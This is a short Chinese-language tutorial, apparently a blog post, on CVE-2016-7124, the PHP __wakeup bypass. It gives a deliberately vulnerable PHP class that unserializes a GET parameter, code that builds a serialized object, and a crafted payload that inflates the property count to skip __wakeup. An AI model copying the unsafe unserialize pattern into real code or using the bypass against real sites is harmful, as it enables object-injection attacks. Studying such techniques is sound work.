本文最后更新于:2021年8月28日晚上6点40分
CVE-2016-7124
漏洞原理
当反序列化字符串中,表示属性个数的值大于真实属性个数时,会绕过 __wakeup 函数的执行。
漏洞影响范围
PHP5 < 5.6.25
PHP7 < 7.0.10
PHP5.5.9的wakeup绕过
假设有以下代码:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
| <?php class User{ public $username; public $password; function __wakeup(){ die("123"); } function __destruct(){ die("456"); } } $a = $_GET['a']; $a_unseri = unserialize($a); var_dump($a_unseri);
?>
|
构造对象:
1 2 3 4 5 6 7 8 9 10
| <?php class User{ public $username = "Lxxx"; public $password = "lxxx"; } $a = new User(); echo urlencode(serialize($a)); echo "\n"; echo serialize($a); ?>
|
得到结果:
1 2
| O%3A4%3A%22User%22%3A2%3A%7Bs%3A8%3A%22username%22%3Bs%3A4%3A%22Lxxx%22%3Bs%3A8%3A%22password%22%3Bs%3A4%3A%22lxxx%22%3B%7D O:4:"User":2:{s:8:"username";s:4:"Lxxx";s:8:"password";s:4:"lxxx";}
|
对浏览器传参:
1
| O%3A4%3A%22User%22%3A2%3A%7Bs%3A8%3A%22username%22%3Bs%3A4%3A%22Lxxx%22%3Bs%3A8%3A%22password%22%3Bs%3A4%3A%22lxxx%22%3B%7D
|
得到结果为:

但是当我们将对象数修改的大一些(由2修改为3):
1 2
| O:4:"User":2:{s:8:"username";s:4:"Lxxx";s:8:"password";s:4:"lxxx";} O:4:"User":3:{s:8:"username";s:4:"Lxxx";s:8:"password";s:4:"lxxx";}
|
即传参:
1
| O%3A4%3A%22User%22%3A3%3A%7Bs%3A8%3A%22username%22%3Bs%3A4%3A%22Lxxx%22%3Bs%3A8%3A%22password%22%3Bs%3A4%3A%22lxxx%22%3B%7D
|
得到的结果为:

也就绕过了wakeup这个魔术方法